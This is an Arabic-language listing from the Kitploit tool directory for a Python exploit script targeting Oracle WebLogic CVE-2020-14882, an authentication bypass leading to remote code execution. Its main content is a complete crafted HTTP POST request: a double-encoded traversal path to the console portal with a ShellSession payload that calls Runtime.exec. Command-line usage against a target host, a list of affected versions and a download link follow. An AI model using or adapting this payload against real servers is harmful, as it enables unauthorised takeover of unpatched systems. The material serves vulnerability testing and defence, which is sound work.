Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Weblogic_Unauthorized-bypass-RCE — نص استغلال قائم على Python لـ Oracle WebLogic CVE-2020-14882 تجاوز غير مصرح به RCE. يختبر تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد عبر طلبات HTTP مصممة إلى بوابة وحدة التحكم. | Kitploit
أدوات/GitHubGitHub/ludy-dev/weblogic_unauthorized-bypass-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubludy-dev/weblogic_unauthorized-bypass-rce

Weblogic_Unauthorized-bypass-RCE

نص استغلال قائم على Python لـ Oracle WebLogic CVE-2020-14882 تجاوز غير مصرح به RCE. يختبر تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد عبر طلبات HTTP مصممة إلى بوابة وحدة التحكم.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
811منذ 5 سنواتلم تتم المراجعة بعد
مشاركة

(CVE-2020–14882) تجاوز التصريح غير المصرح به وتنفيذ الأوامر عن بُعد في WebLogic

(CVE-2020-14882) سكريبت اختبار تجاوز التصريح غير المصرح به وتنفيذ الأوامر عن بُعد في Oracle Weblogic يعمل على Python3

الطلبات

root@kitploit:~
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");

يتحقق سكريبت الاختبار من بيانات الاستجابة باستخدام pcre.

الاستخدام

root@kitploit:~
- 7001/tcp (منفذ WebLogic الافتراضي)
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <عنوان الهدف>

- منفذ محدد/tcp
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <عنوان الهدف> <المنفذ>

الإصدارات المتأثرة

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

إثبات المفهوم

https://github.com/jas502n/CVE-2020-14882

المراجع

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf https://www.tenable.com/blog/cve-2020-14882-oracle-weblogic-remote-code-execution-vulnerability-exploited-in-the-wild

تنزيل الأداة